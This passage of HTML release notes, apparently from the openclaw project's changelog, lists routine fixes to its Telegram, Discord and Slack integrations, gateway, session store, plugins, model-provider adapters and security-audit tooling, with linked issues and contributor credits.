<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
